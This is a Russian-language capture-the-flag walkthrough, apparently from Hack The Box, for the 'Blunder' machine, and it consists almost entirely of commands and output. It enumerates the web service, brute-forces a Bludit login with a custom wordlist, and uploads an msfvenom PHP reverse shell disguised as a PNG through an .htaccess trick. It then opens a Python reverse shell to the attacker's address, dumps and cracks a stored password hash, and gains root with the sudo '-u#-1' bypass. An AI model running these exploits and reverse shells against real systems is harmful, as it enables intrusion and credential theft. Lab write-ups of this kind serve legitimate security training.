Обзор сервисов
$ nmapAutomator.sh -H 10.10.10.191 -t Full
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,php
=> http://10.10.10.191/todo.txt => пользователь fergus
Создадим свой словарь с паролями
Скачаем https://github.com/digininja/CeWL
cewl http://10.10.10.191 > list.txt
Брутфорс
$ ruby 48746.rb -r https://10.10.10.191 -u fergus -w list.txt
fergus:RolandDeschain
Публичный эксплоит
msfvenom -p php/reverse_php LHOST=10.10.14.6 LPORT=1234 -f raw -b '"' > evil.png
echo -e "<?php $(cat evil.png)" > evil.png
echo "RewriteEngine off" > .htaccess
echo "AddType application/x-httpd-php .png" >> .htaccess
searchsploit -m multiple/webapps/48701.txt
python3 exp.py
nc -lnvp 1234
curl http://10.10.10.191/bl-content/tmp/temp/evil.png
$ cat /var/www/bludit-3.10.0a/bl-content/databases/users.php
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
crackstation.com => Password120
Получаем нормальный шелл:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
nc -lnvp 1235
Пользовательский флаг
$ su - hugo
hugo@blunder:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:b9:cb:58 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.191/24 brd 10.10.10.255 scope global noprefixroute ens33
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:cb58/64 scope global dynamic mngtmpaddr noprefixroute
valid_lft 86135sec preferred_lft 14135sec
inet6 fe80::250:56ff:feb9:cb58/64 scope link noprefixroute
valid_lft forever preferred_lft forever
hugo@blunder:~$ cat user.txt
78cd90414dca08cfbd6b5f900249367d
Повышение привилегий
hugo@blunder:~$ sudo -l
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
=> sudo /bin/bash в качестве любого пользователя, кроме root:
sudo -u#-1 /bin/bash
Флаг суперпользователя
root@blunder:/root# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:b9:cb:58 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.191/24 brd 10.10.10.255 scope global noprefixroute ens33
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:cb58/64 scope global dynamic mngtmpaddr noprefixroute
valid_lft 86283sec preferred_lft 14283sec
inet6 fe80::250:56ff:feb9:cb58/64 scope link noprefixroute
valid_lft forever preferred_lft forever
root@blunder:/root# cat root.txt
2eeee0cae3c2c3d7d66eb86558e8d8ab